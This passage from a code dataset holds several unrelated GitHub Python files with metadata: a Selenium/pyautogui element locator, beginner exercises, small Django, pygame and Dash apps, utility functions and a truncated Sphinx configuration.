else:\n CommonUtil.ExecLog(\n \"\",\n \"Found %s hidden elements and %s displayed elements. Returning %s displayed elements only\"\n % (hidden_len, displayed_len, displayed_len),\n 1\n )\n return all_matching_elements\n elif len(all_matching_elements) == 0:\n if hidden_len > 0 and Filter != \"allow hidden\":\n CommonUtil.ExecLog(\n \"\",\n \"Found %s hidden elements and no displayed elements. Nothing to return.\\n\" % hidden_len +\n \"To get hidden elements add a row (\\\"allow hidden\\\", \\\"optional option\\\", \\\"yes\\\")\",\n 3\n )\n return \"zeuz_failed\"\n elif len(all_matching_elements) == 1 and index_number is None:\n if hidden_len > 0 and Filter != \"allow hidden\":\n CommonUtil.ExecLog(\n \"\",\n \"Found %s hidden elements and %s displayed elements. Returning the displayed element only\\n\" % (hidden_len, displayed_len) +\n \"To get hidden elements add a row (\\\"allow hidden\\\", \\\"optional option\\\", \\\"yes\\\") and also consider providing index\",\n 2\n )\n elif Filter == \"allow hidden\":\n CommonUtil.ExecLog(\"\", \"Found %s hidden element and %s displayed element\" % (hidden_len, displayed_len), 1)\n return all_matching_elements[0]\n elif len(all_matching_elements) > 1 and index_number is None:\n if hidden_len > 0 and Filter != \"allow hidden\":\n CommonUtil.ExecLog(\n \"\",\n \"Found %s hidden elements and %s displayed elements. Returning the first displayed element only\\n\" % (hidden_len, displayed_len) +\n \"To get hidden elements add a row (\\\"allow hidden\\\", \\\"optional option\\\", \\\"yes\\\") and also consider providing index\",\n 2\n )\n elif Filter != \"allow hidden\":\n CommonUtil.ExecLog(\n \"\",\n \"Found %s displayed elements. Returning the first displayed element only. Consider providing index\" % displayed_len,\n 2\n )\n else:\n CommonUtil.ExecLog(\n \"\",\n \"Found %s hidden elements and %s displayed elements. Returning the first element only. 
Consider providing index\" % (hidden_len, displayed_len),\n 2\n )\n return all_matching_elements[0]\n elif len(all_matching_elements) == 1 and index_number not in (-1, 0):\n if hidden_len > 0 and Filter != \"allow hidden\":\n CommonUtil.ExecLog(\n sModuleInfo,\n \"Found %s hidden elements and %s displayed elements but you provided a wrong index number. Returning the only displayed element\\n\" % (hidden_len, displayed_len) +\n \"To get hidden elements add a row (\\\"allow hidden\\\", \\\"optional option\\\", \\\"yes\\\") and also consider providing correct index\",\n 2,\n )\n elif Filter != \"allow hidden\":\n CommonUtil.ExecLog(\n sModuleInfo,\n \"Found 0 hidden elements and %s displayed elements but you provided a wrong index number. Returning the only displayed element\\n\" % displayed_len,\n 2,\n )\n elif Filter == \"allow hidden\":\n CommonUtil.ExecLog(\n \"\",\n \"Found %s hidden element and %s displayed element but you provided a wrong index number. Returning the only element\" % (hidden_len, displayed_len),\n 2\n )\n return all_matching_elements[0]\n elif len(all_matching_elements) == 1 and index_number in (-1, 0):\n if hidden_len > 0 and Filter != \"allow hidden\":\n CommonUtil.ExecLog(\n \"\",\n \"Found %s hidden elements and %s displayed elements. Returning the displayed element of index %s\\n\" % (hidden_len, displayed_len, index_number) +\n \"To get hidden elements add a row (\\\"allow hidden\\\", \\\"optional option\\\", \\\"yes\\\")\",\n 1\n )\n elif Filter != \"allow hidden\":\n CommonUtil.ExecLog(\n \"\",\n \"Found 0 hidden elements and %s displayed elements. Returning the displayed element of index %s\" % (displayed_len, index_number),\n 1\n )\n elif Filter == \"allow hidden\":\n CommonUtil.ExecLog(\n \"\",\n \"Found %s hidden elements and %s displayed elements. Returning the element of index %s\" % (hidden_len, displayed_len, index_number),\n 1\n )\n return all_matching_elements[0]\n elif len(all_matching_elements) > 1 and index_number is not None:\n # if (len(all_matching_elements) - 1) < abs(index_number):\n if -len(all_matching_elements) <= index_number < len(all_matching_elements):\n if hidden_len > 0 and Filter != \"allow hidden\":\n CommonUtil.ExecLog(\n \"\",\n \"Found %s hidden elements and %s displayed elements. Returning the displayed element of index %s\\n\" % (hidden_len, displayed_len, index_number) +\n \"To get hidden elements add a row (\\\"allow hidden\\\", \\\"optional option\\\", \\\"yes\\\")\",\n 1\n )\n elif Filter != \"allow hidden\":\n CommonUtil.ExecLog(\n \"\",\n \"Found 0 hidden elements and %s displayed elements. Returning the displayed element of index %s\" % (displayed_len, index_number),\n 1\n )\n else:\n CommonUtil.ExecLog(\n \"\",\n \"Found %s hidden elements and %s displayed elements. Returning the element of index %s\" % (hidden_len, displayed_len, index_number),\n 1\n )\n return all_matching_elements[index_number]\n else:\n if hidden_len > 0 and Filter != \"allow hidden\":\n CommonUtil.ExecLog(\n \"\",\n \"Found %s hidden elements and %s displayed elements. Index exceeds the number of displayed elements found\\n\" % (hidden_len, displayed_len) +\n \"To get hidden elements add a row (\\\"allow hidden\\\", \\\"optional option\\\", \\\"yes\\\") and also consider providing correct index\",\n 3\n )\n elif Filter != \"allow hidden\":\n CommonUtil.ExecLog(\n \"\",\n \"Found 0 hidden elements and %s displayed elements. 
Index exceeds the number of displayed elements found\" % displayed_len,\n 3\n )\n else:\n CommonUtil.ExecLog(\n \"\",\n \"Found %s hidden elements and %s displayed elements. Index exceeds the number of elements found\" % (hidden_len, displayed_len),\n 3\n )\n return \"zeuz_failed\"\n else:\n return \"zeuz_failed\"\n except Exception:\n return CommonUtil.Exception_Handler(sys.exc_info())\n # Don't want to show error messages from here, especially for wait_for_element()\n # CommonUtil.ExecLog(sModuleInfo, \"Exception caught - %s\" % str(sys.exc_info()), 0)\n # return \"zeuz_failed\"\n\n\ndef filter_elements(all_matching_elements_visible_invisible, Filter):\n # visible, enable\n all_matching_elements = []\n try:\n if Filter != \"allow hidden\":\n for each in all_matching_elements_visible_invisible:\n try:\n if each.is_displayed():\n all_matching_elements.append(each)\n except:\n pass\n return all_matching_elements\n else:\n return all_matching_elements_visible_invisible\n except:\n all_matching_elements = []\n return all_matching_elements\n\n\ndef _locate_index_number(step_data_set):\n \"\"\"\n Check if index exists, if it does, get the index value.\n if we cannot convert index to integer, set it to None\n \"\"\"\n try:\n for left, mid, right in step_data_set:\n l = left.strip().lower()\n m = mid.strip().lower()\n if l == \"index\" and m == \"element parameter\":\n return int(right.strip())\n return None\n except Exception:\n CommonUtil.Exception_Handler(sys.exc_info(), None, \"Index = 0 is set\")\n return None\n\n\ndef _pyautogui(step_data_set):\n \"\"\" Gets coordinates for pyautogui (doesn't provide an object) \"\"\"\n\n \"\"\" \n Valid files:\n We do our best to find the file for the user, it can be:\n Full path. Eg: /home/user/test.png\n Local directory. Eg: test.png\n Zeuz File Attachment. 
Eg: test.png - The full path is in the Shared Variables under the filename\n\n If provided, scales image to fit currently displayed resolution, so as to provide a more accurate match \n There are three modes of operation:\n No resolution - don't re-scale: (image, element paramater, filename.png)\n Resolution in filename - scale accordingly: (image, element paramater, filename-1920x1080.png)\n Resolution in step data - scale accordingly: (1920x1080, element paramater, filename.png)\n \n If a reference element is provided (parent/child parameter, name doens't matter), then we have three methods by which to locate the element of interest:\n Field = left, right, up, down - we'll favour any elements in this direction and return it\n Field = INDEX NUMBER - If a number is provided (>=1), we'll return the nTH element found\n Field = ANYTHING ELSE - We'll find the closest element to it\n \"\"\"\n\n # Only used by desktop, so only import here\n import pyautogui, os.path, re\n\n sModuleInfo = inspect.currentframe().f_code.co_name + \" : \" + MODULE_NAME\n\n # Recall file attachment, if not already set\n file_attachment = []\n if sr.Test_Shared_Variables(\"file_attachment\"):\n file_attachment = sr.Get_Shared_Variables(\"file_attachment\")\n\n # Parse data set\n try:\n file_name = \"\"\n file_name_parent = \"\"\n resolution = \"\"\n direction = \"all\"\n index = False\n idx = 0\n confidence = 0.85\n for left, mid, right in step_data_set:\n left = left.strip().lower()\n mid = mid.strip().lower()\n if mid == \"element parameter\": # Find element line\n # resolution = left # Save the resolution of the source of the image, if provided\n if \"resolution\" in left:\n resolution = right.strip().lower()\n elif \"index\" in left:\n idx = int(right.strip())\n elif \"confidence\" in left:\n confidence = float(right.replace(\"%\", \"\").replace(\" \", \"\").lower())/100\n else:\n file_name = right.strip()\n if \"~\" in file_name:\n file_name = str(Path(os.path.expanduser(file_name)))\n\n if mid in (\"child parameter\", \"parent parameter\"): # Find a related image, that we'll use as a reference point\n file_name_parent = right # Save Value as the filename\n direction = left.lower().strip() # Save Field as a possible distance or index\n elif mid == \"action\" and file_name == \"\": # Alternative method, there is no element parameter, so filename is expected on the action line\n file_name = Path(right) # Save Value as the filename\n\n # Check that we have some value\n if file_name == \"\":\n return \"zeuz_failed\"\n\n # Try to find the image file\n if file_name not in file_attachment and not os.path.exists(file_name):\n CommonUtil.ExecLog(\n sModuleInfo,\n \"Could not find file attachment called %s, and could not find it locally\" % file_name,\n 3,\n )\n return \"zeuz_failed\"\n if file_name in file_attachment:\n file_name = file_attachment[file_name] # In file is an attachment, get the full path\n\n if file_name_parent != \"\":\n if file_name_parent not in file_attachment and not os.path.exists(file_name_parent):\n CommonUtil.ExecLog(\n sModuleInfo,\n \"Could not find file attachment called %s, and could not find it locally\" % file_name_parent,\n 3,\n )\n return \"zeuz_failed\"\n if file_name_parent in file_attachment:\n file_name_parent = file_attachment[file_name_parent] # In file is an attachment, get the full path\n\n # Now file_name should have a directory/file pointing to the correct image\n\n # There's a problem when running from Zeuz with encoding. pyautogui seems sensitive to it. 
This fixes that\n # file_name = file_name.encode('ascii')\n if file_name_parent != \"\":\n file_name_parent = file_name_parent.encode(\"ascii\")\n\n except:\n return CommonUtil.Exception_Handler(sys.exc_info(), None, \"Error parsing data set\")\n\n # Parse direction (physical direction, index or nothing)\n if direction != \"all\": # If a reference image was specified (direction would be set to a different value)\n try:\n if direction in (\"left\", \"right\", \"up\", \"down\"): # User specified a direction to look for the element\n pass\n else:\n try:\n direction = int(direction) # Test if it's a number, if so, format it properly\n index = True\n direction -= 1 # Offset by one, because user will set first element as one, but in the array it's element zero\n except: # Not a number\n direction = \"all\" # Default to search all directions equally (find the closest image alement to the reference)\n except:\n return CommonUtil.Exception_Handler(sys.exc_info(), None, \"Error parsing direction\")\n\n # Find element information\n try:\n # Scale image if required\n regex = re.compile(r\"(\\d+)\\s*x\\s*(\\d+)\", re.IGNORECASE) # Create regex object with expression\n match = regex.search(file_name) # Search for resolution within filename (this is the resolution of the screen the image was captured on)\n if match is None and resolution != \"\": # If resolution not in filename, try to find it in the step data\n match = regex.search(resolution) # Search for resolution within the Field of the element paramter row (this is the resolution of the screen the image was captured on)\n\n if match is not None: # Match found, so scale\n CommonUtil.ExecLog(sModuleInfo, \"Scaling image (%s)\" % match.group(0), 5)\n size_w, size_h = (\n int(match.group(1)),\n int(match.group(2)),\n ) # Extract width, height from match (is screen resolution of desktop image was taken on)\n file_name = _scale_image(file_name, size_w, size_h) # Scale image element\n if file_name_parent != \"\":\n file_name_parent = _scale_image(file_name_parent, size_w, size_h) # Scale parent image element\n\n # Find image on screen (file_name here is either an actual directory/file or a PIL image object after scaling)\n element_list = []\n start = time.time()\n while True:\n element = pyautogui.locateAllOnScreen(\n file_name, grayscale=True, confidence=confidence\n ) # Get coordinates of element. Use greyscale for increased speed and better matching across machines. May cause higher number of false-positives\n element_list = tuple(element)\n if element_list or time.time() > start + int(sr.Get_Shared_Variables(\"element_wait\")):\n break\n time.sleep(0.1)\n # if len(tuple(tmp)) == 0: # !!! 
This should work, but accessing the generator causes it to lose one or more of it's results, thus causing an error when we try to use it with a single image\n # print \">>>>IN\", element\n # CommonUtil.ExecLog(sModuleInfo, \"Image element not found\", 0)\n # return \"zeuz_failed\"\n\n ################################################################################\n ######################### ALL PIECES SET - FIND ELEMENT ########################\n ################################################################################\n\n # If no reference image, just return the first match\n if file_name_parent == \"\":\n # element_list = tuple(element)\n # First match reassigned as the only element\n element = None\n if -len(element_list) <= idx < len(element_list):\n element = element_list[idx]\n elif len(element_list) != 0:\n CommonUtil.ExecLog(sModuleInfo, \"Found %s elements. Index out of range\" % len(element_list), 3)\n\n # Reference image specified, so find the closest image element to it\n else:\n CommonUtil.ExecLog(sModuleInfo, \"Locating with a reference element\", 0)\n\n # Get coordinates of reference image\n start = time.time()\n while True:\n element_parent = pyautogui.locateOnScreen(\n file_name_parent, grayscale=True, confidence=0.85\n )\n if element_parent or time.time() > start + int(sr.Get_Shared_Variables(\"element_wait\")):\n break\n time.sleep(0.1)\n if element_parent == None:\n CommonUtil.ExecLog(sModuleInfo, \"Reference image not found\", 0)\n return \"zeuz_failed\"\n\n # Initialize variables\n parent_centre = (\n element_parent[0] + int(element_parent[2] / 2),\n element_parent[1] + int(element_parent[3] / 2),\n ) # Calculate centre coordinates of parent\n element_result = (\n []\n ) # This will hold the best match that we've found as we check them all\n distance_new = [0, 0] # This will hold the current distance\n distance_best = [0, 0] # This will hold the distance for the best match\n\n # User provided an index number, so find the nTH element\n if index == True:\n try:\n element = tuple(element)[direction]\n except:\n return CommonUtil.Exception_Handler(sys.exc_info(), None, \"Provided index number is invalid\")\n\n # User provided a direction, or no indication, so try to find the element based on that\n else:\n # Loop through all found elements, and find the one that is closest to the reference image element\n for e in element:\n # Calculate centre of image to centre of reference image\n distance_new[0] = parent_centre[0] - (e[0] + int(e[2] / 2))\n distance_new[1] = parent_centre[1] - (e[1] + int(e[3] / 2))\n\n # Remove negavite values, depending on direction. This allows us to favour a certain direction by keeping the original number\n if direction == \"all\":\n distance_new[0] = abs(distance_new[0]) # Remove negative sign for x\n distance_new[1] = abs(distance_new[1]) # Remove negative sign for y\n elif direction in (\"up\", \"down\"):\n distance_new[0] = abs(distance_new[0]) # Remove negative sign for x - we don't care about that direction\n elif direction in (\"left\", \"right\"):\n distance_new[1] = abs(distance_new[1]) # Remove negative sign for y - we don't care about that direction\n\n # Compare distances\n if element_result == []: # First run, just save this as the closest match\n element_result = e\n distance_best = list(distance_new) # Very important! - this must be saved with the list(), because python will make distance_best a pointer to distance_new without it, thus screwing up what we are trying to do. 
Thanks Python.\n else: # Subsequent runs, compare distances\n if direction == \"all\" and (distance_new[0] < distance_best[0] or distance_new[1] < distance_best[1]): # If horozontal or vertical is closer than our best/closest distance that we've found thus far\n element_result = e # Save this element as the best match\n distance_best = list(distance_new) # Save the distance for further comparison\n elif direction == \"up\" and (distance_new[0] < distance_best[0] or distance_new[1] > distance_best[1]): # Favour Y direction up\n element_result = e # Save this element as the best match\n distance_best = list(\n distance_new\n ) # Save the distance for further comparison\n elif direction == \"down\" and (distance_new[0] < distance_best[0] or distance_new[1] < distance_best[1]): # Favour Y direction down\n element_result = e # Save this element as the best match\n distance_best = list(distance_new) # Save the distance for further comparison\n elif direction == \"left\" and (distance_new[0] > distance_best[0] or distance_new[1] < distance_best[1]): # Favour X direction left\n element_result = e # Save this element as the best match\n distance_best = list(distance_new) # Save the distance for further comparison\n elif direction == \"right\" and (distance_new[0] < distance_best[0] or distance_new[1] < distance_best[1]): # Favour X direction right\n element_result = e # Save this element as the best match\n distance_best = list(distance_new) # Save the distance for further comparison\n\n # Whether there is one or more matches, we now have the closest image to our reference, so save the result in the common variable\n element = element_result\n\n # Check result\n if element is None or element in failed_tag_list or element == \"\":\n return \"zeuz_failed\"\n else:\n return element\n\n except:\n traceback.print_exc()\n return \"zeuz_failed\"\n\n\ndef _scale_image(file_name, size_w, size_h):\n \"\"\" This function calculates ratio and scales an image for comparison by _pyautogui() \"\"\"\n\n sModuleInfo = inspect.currentframe().f_code.co_name + \" : \" + MODULE_NAME\n\n # Only used by desktop, so only import here\n import pyautogui\n from PIL import Image\n from decimal import Decimal\n\n try:\n # Open image file\n file_name = open(file_name, \"rb\") # Read file into memory\n file_name = Image.open(file_name) # Convert to PIL format\n\n # Read sizes\n screen_w, screen_h = pyautogui.size() # Read screen resolution\n image_w, image_h = file_name.size # Read the image element's actual size\n\n # Calculate new image size\n if size_w > screen_w: # Make sure we create the scaling ratio in the proper direction\n ratio = Decimal(size_w) / Decimal(screen_w) # Get ratio (assume same for height)\n else:\n ratio = Decimal(screen_w) / Decimal(size_w) # Get ratio (assume same for height)\n size = (int(image_w * ratio), int(image_h * ratio)) # Calculate new resolution of image element\n\n # Scale image\n # file_name.thumbnail(size, Image.LANCZOS) # Resize image per calculation above\n\n return file_name.resize(size) # Return the scaled image object\n except:\n return CommonUtil.Exception_Handler(sys.exc_info(), None, \"Error scaling image\")\n\n\n\"\"\"\n#Sample sibling Example1:\n#xpath_format = '//<sibling_tag>[<sibling_element>]/ancestor::<immediate_parent_tag>[<immediate_parent_element>]//<target_tag>[<target_element>]'\n\n#step_data_set = [( 'tag' , 'parent parameter' , 'tagvale' , False , False ) , ( 'id' , 'element parameter' , 'twotabsearchtextbox' , False , False ) , ( 'text' , 'selenium action' , 'Camera' , 
False , False ), ( 'class' , 'sibling parameter' , 'twotabsearchtextbox' , False , False ), ( 'class' , 'parent parameter' , 'twotabsearchtextbox' , False , False )]\n\n#step_data_set = [ ( 'role' , 'element parameter' , 'checkbox' , False , False , '' ) , ( 'text' , 'sibling parameter' , 'charlie' , False , False , '' ) , ( '*class' , 'parent parameter' , 'md-table-row' , False , False , '' ) , ( 'click' , 'selenium action' , 'click' , False , False , '' ) ] \n\n\n\n#Sample parent and element:\n#'//*[@bblocalname=\"deviceActivationPasswordTextBox\"]/descendant::*[@type=\"password\"]'\n#step_data_set = [ ( 'typ' , 'element parameter' , 'password' , False , False , '' ) , ( 'text' , 'selenium action' , 'your password' , False , False , '' ) , ( 'bblocalname' , 'parent parameter' , 'deviceActivationPasswordTextBox' , False , False , '' ) ] \n\n\n\nstep_data_set = [ ( '*resource-id' , 'element parameter' , 'com.assetscience.androidprodiagnostics.cellmd:id/next' , False , False ) , ( 'click' , 'appium action' , 'na' , False , False ) ]\n\n\ndriver = None\nquery_debug = True\nglobal driver_type \ndriver_type = \"selenium\"\nglobal debug \ndebug = True\nprint _construct_query (step_data_set)\"\"\"\n\ndriver_type = 'selenium'\n\nif __name__ == \"__main__\":\n x,y=_construct_query([\n ['tag','parent parameter','hello//'],\n [\"arial-label\", 'element parameter', 'https://asdasd']\n ])\n print(x)\n CommonUtil.ExecLog(\n 'sModuleInfo',\n \"To locate the Element we used %s:\\n%s\"\n % (y, x),\n 5,\n )","repo_name":"AutomationSolutionz/Zeuz_Python_Node","sub_path":"Framework/Built_In_Automation/Shared_Resources/LocateElement.py","file_name":"LocateElement.py","file_ext":"py","file_size_in_byte":72226,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"21"} +{"seq_id":"19797969907","text":"# Crie um programa que leia o nome de uma cidade diga se ela começa ou não com o nome “SANTO”.\n\nnome_cidade = input('Digite o nome da sua cidade: ').strip().upper().split()\n\nif nome_cidade[0] == \"SANTO\":\n print('O nome da sua cidade começa com o nome \"Santo\"')\nelse:\n print('O nome da sua cidade não começa com o nome \"Santo\"')\n\n\n'''nome_cidade = input('Digite o nome da sua cidade: ').strip().upper()\nprint(nome_cidade[:5] == \"SANTO\")'''\n","repo_name":"fellipemarlus/python-exercises","sub_path":"Exercises/024-verificando_as_primeiras_letras_de_um_texto.py","file_name":"024-verificando_as_primeiras_letras_de_um_texto.py","file_ext":"py","file_size_in_byte":454,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"610065494","text":"from django import template\nfrom resources.models import Vehicle\nfrom datetime import date\n\nregister = template.Library()\n\n@register.simple_tag\ndef get_vehicle(num_items):\n lista = []\n v1 = Vehicle()\n v1.name = 'Uno'\n v1.description = 'Carro da Fiat'\n v1.license_plate = 'HKF3654'\n v1.manufacture_year = date(2007, 1, 1)\n v1.save()\n lista.append(v1)\n # lista.append('Fiat')\n # lista.append('KIA')\n # lista.append('Volks')\n # lista.append('Ford')\n # lista.append('Toyota')\n\n return lista[:num_items]\n","repo_name":"mugbug/django-course","sub_path":"fleet_control/resources/templatetags/vehicle_tags.py","file_name":"vehicle_tags.py","file_ext":"py","file_size_in_byte":541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73791571254","text":"lista = []\ncontinua = 'S'\ncont = 0\nwhile continua not in 
'nN':\n num = int(input('Digite um valor: '))\n continua = str(input('Quer continuar? [S/N] ')).upper().strip()[0]\n lista.append(num)\n cont += 1\nlista.sort(reverse=True)\nprint('-='*25)\nprint(f'Você digitou {cont} elementos.')\nprint(f'Os valores em ordem decrescente são {lista}')\nif 5 in lista:\n print('O valor 5 foi encontrado na lista! ')\nelse:\n print('O valor 5 não foi encontrado na lista! ')\n\n\n","repo_name":"ivanDourado/guanabaraPython","sub_path":"mundo3/exercicios/ex081-lista.py","file_name":"ex081-lista.py","file_ext":"py","file_size_in_byte":475,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20138467421","text":"import pygame\npygame.init()\npygame.font.init()\nscreen = pygame.display.set_mode((800, 600))\npygame.display.set_caption('Học Toán Online')\nWHITE = (255, 255, 255)\nBLACK = (0, 0, 0)\nfont = pygame.font.Font('freesansbold.ttf', 32)\ndialogue_font = pygame.font.SysFont('utf8', 32)\nrunning = True\nbg = pygame.image.load(('IMG_111.jpg'))\nbg = pygame.transform.scale(bg, (800, 700))\nbando = pygame.image.load(('IMG_111.jpg'))\nmenu = pygame.image.load(('IMG_111.jpg'))\nhome = pygame.image.load(('IMG_111.jpg'))\nhome = pygame.transform.scale(home, (50, 50))\nx = 'first'\nclock = pygame.time.Clock()\nfont1 = pygame.font.SysFont('san', 80)\ntextstart = font.render(\"START \", True, BLACK)\n\nwhile running:\n mouse_x, mouse_y = pygame.mouse.get_pos()\n pygame.draw.rect(screen, BLACK, (0, 0, 800, 600))\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n running = False\n if event.type == pygame.MOUSEBUTTONDOWN:\n if event.button == 1 and (mouse_x > 300 and mouse_x < 500) and (mouse_y > 350 and mouse_y < 450) and x == 'first':\n x = 'bg'\n if x == 'first':\n pygame.draw.rect(screen, WHITE, (300, 350, 200, 100))\n screen.blit(textstart, (350, 380))\n if x == 'bg':\n screen.blit(bg, (0, 0))\n\n pygame.display.flip()\n clock.tick(120)\n","repo_name":"TienManh308/Tin","sub_path":"python/pygame/phanmem/new.py","file_name":"new.py","file_ext":"py","file_size_in_byte":1320,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"12227193648","text":"#!/usr/bin/python3\n\"\"\"function to define a grid\"\"\"\n\n\ndef island_perimeter(grid):\n \"\"\"grid is a list of lists containing integers\"\"\"\n num_rows = len(grid)\n num_cols = len(grid[0])\n perimeter = 0\n\n for row in range(num_rows):\n for col in range(num_cols):\n if grid[row][col] == 1:\n perimeter += 4\n if row > 0 and grid[row - 1][col] == 1:\n perimeter -= 2\n if col > 0 and grid[row][col - 1] == 1:\n perimeter -= 2\n return perimeter\n","repo_name":"Patrick-052/alx-low_level_programming","sub_path":"0x1C-makefiles/5-island_perimeter.py","file_name":"5-island_perimeter.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"41413648006","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Nov 18 15:22:18 2019\n\n@author: 106300\n\"\"\"\n\nimport dash\nimport dash_core_components as dcc\nimport dash_html_components as html\nimport pandas as pd\nimport plotly.graph_objs as go\n\n\ndef add_patch(dib,p_x,p_y, color):\n dib.add_shape(go.layout.Shape(type=\"rect\",x0=p_x-0.25,y0=p_y-0.25,x1=p_x+0.25,y1=p_y+0.25,\n line=dict(color=color), fillcolor=color),layer = \"below\", row=1, col=1 )\n return\nexternal_stylesheets = ['https://codepen.io/chriddyp/pen/bWLwgP.css']\n\napp = 
dash.Dash(__name__, external_stylesheets=external_stylesheets)\n\ndf = pd.read_csv(\n 'https://gist.githubusercontent.com/chriddyp/' +\n '5d1ea79569ed194d432e56108a04d188/raw/' +\n 'a9f9e8076b837d541398e999dcbac2b2826a81f8/'+\n 'gdp-life-exp-2007.csv')\n\np_x = 1\np_y = 1\nfig = go.Figure()\napp.layout = html.Div([\nfig.add_shape(\n # filled Rectangle\n go.layout.Shape(\n type=\"rect\",\n x0=3,\n y0=1,\n x1=6,\n y1=2,\n line=dict(\n color=\"RoyalBlue\",\n width=2,\n ),\n fillcolor=\"LightSkyBlue\",\n ))\n\n])\nprint('primero paso por aqui')\n\nif __name__ == '__main__':\n print(df)\n app.run_server(debug=True)","repo_name":"orlando68/Stanford","sub_path":"app4m.py","file_name":"app4m.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74448296053","text":"from django.shortcuts import render\nfrom django.http import HttpResponse\n\nfrom home.forms import ContactForm\nfrom django.contrib import messages\n\nfrom home.models import Teacher\n# Create your views here.\n\n\ndef home(request):\n\n teachers = Teacher.objects.all()\n\n if request.method == 'POST':\n # POST here means all data from frontend\n form = ContactForm(request.POST)\n if form.is_valid():\n form.save()\n messages.success(request, 'The form has been submitted!')\n else:\n form = ContactForm()\n\n context = {\n 'form': form,\n \"teachers\": teachers,\n }\n return render(request, 'home/index.html', context)\n\n\ndef about(request):\n return render(request, 'home/about.html')\n\n\ndef teacher(request):\n teachers = Teacher.objects.all()\n context = {\n 'teachers': teachers\n }\n return render(request, 'home/teacher.html', context)\n","repo_name":"gurolbilgin/landing_django","sub_path":"home/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":915,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"9124146923","text":"import logging\nimport os\nimport math\n\n\ndef size_and_amount_files(folder='data'):\n total_size = os.path.getsize(folder)\n amount_files = 0\n for item in os.listdir(folder):\n itempath = os.path.join(folder, item)\n if os.path.isfile(itempath):\n amount_files += 1\n total_size += os.path.getsize(itempath)\n elif os.path.isdir(itempath):\n total_size += size_and_amount_files(itempath)\n return total_size, amount_files\n\n\ndef convert_size(size_bytes):\n if size_bytes == 0:\n return \"0B\"\n size_name = (\"B\", \"KB\", \"MB\", \"GB\", \"TB\", \"PB\", \"EB\", \"ZB\", \"YB\")\n i = int(math.floor(math.log(size_bytes, 1024)))\n p = math.pow(1024, i)\n s = round(size_bytes / p, 2)\n return \"%s %s\" % (s, size_name[i])\n\n\nclass CustomFormatter(logging.Formatter):\n\n grey = \"\\x1b[38;20m\"\n yellow = \"\\x1b[33;20m\"\n blue = \"\\x1b[1;34m\"\n red = \"\\x1b[31;20m\"\n bold_red = \"\\x1b[31;1m\"\n reset = \"\\x1b[0m\"\n format = \" [ %(levelname)s ] - %(name)s - %(asctime)s - %(message)s (%(filename)s:%(lineno)d)\"\n\n FORMATS = {\n logging.DEBUG: grey + format + reset,\n logging.INFO: blue + format + reset,\n logging.WARNING: yellow + format + reset,\n logging.ERROR: red + format + reset,\n logging.CRITICAL: bold_red + format + reset\n }\n\n def format(self, record):\n log_fmt = self.FORMATS.get(record.levelno)\n formatter = logging.Formatter(log_fmt)\n return 
formatter.format(record)\n","repo_name":"Merlijnmacgillavry/Library-Project","sub_path":"backend/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":1496,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"27322685471","text":"# Configuration file for the Sphinx documentation builder.\n#\n# This file only contains a selection of the most common options. For a full\n# list see the documentation:\n# https://www.sphinx-doc.org/en/master/usage/configuration.html\n\n# -- Path setup --------------------------------------------------------------\n\n# If extensions (or modules to document with autodoc) are in another directory,\n# add these directories to sys.path here. If the directory is relative to the\n# documentation root, use os.path.abspath to make it absolute, like shown here.\n#\nimport os\nimport sys\n#sys.path.append('../')\n# sys.path.insert(0, os.path.abspath('.'))\nsys.path.insert(0, os.path.abspath('../'))\nsys.path.insert(0, os.path.abspath('../majortrack'))\n\n\n# -- Project information -----------------------------------------------------\n\nproject = 'MajorTrack'\ncopyright = '2019, Jonas I. Liechti'\nauthor = 'Jonas I. Liechti'\n\n# The full version, including alpha/beta/rc tags\nrelease = 'v1.0'\n# ############################################################################\n# ############################################################################\n\n\ndef release():\n with open('version.txt') as f:\n return f.read()\n\n\n# major/minor\nrelease = release().split('+')[0]\nversion = '.'.join(release.split('.')[:2])\n# ############################################################################\n# ############################################################################\n\n# -- General configuration ---------------------------------------------------\n\n# Add any Sphinx extension module names here, as strings. 
They can be\n# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom\n# ones.\nextensions = [\n 'sphinx.ext.autodoc',\n 'sphinx.ext.doctest',\n 'sphinx.ext.coverage',\n 'sphinx.ext.todo',\n 'sphinx.ext.intersphinx',\n 'sphinx.ext.mathjax',\n 'sphinx.ext.ifconfig',\n 'sphinx.ext.viewcode',\n 'sphinx.ext.githubpages',\n 'sphinx.ext.autosummary',\n 'sphinx.ext.extlinks',\n 'sphinx.ext.napoleon',\n 'sphinxcontrib.bibtex',\n]\n\n\n# Add any paths that contain templates here, relative to this directory.\ntemplates_path = ['_templates']\n\n\n# ############################################################################\n# ############################################################################\nsource_suffix = ['.rst', 'md']\nmaster_doc = 'index'\ntodo_include_todos = True\n# ############################################################################\n# ############################################################################\n\n# ############################################################################\n# ############################################################################\non_rtd = os.environ.get('READTHEDOCS', None) == 'True'\nif not on_rtd: # only import and set the theme if we're building docs locally\n import sphinx_rtd_theme\n html_theme = \"sphinx_rtd_theme\"\n html_theme_path = [sphinx_rtd_theme.get_html_theme_path()]\n# ############################################################################\n# ############################################################################\n\n\n# List of patterns, relative to source directory, that match files and\n# directories to ignore when looking for source files.\n# This pattern also affects html_static_path and html_extra_path.\nexclude_patterns = ['_build', 'Thumbs.db', '.DS_Store']\n\n\n# -- Options for HTML output -------------------------------------------------\n\n# The theme to use for HTML and HTML Help pages. See the documentation for\n# a list of builtin themes.\n#\n# html_theme = 'alabaster'\n\n# Add any paths that contain 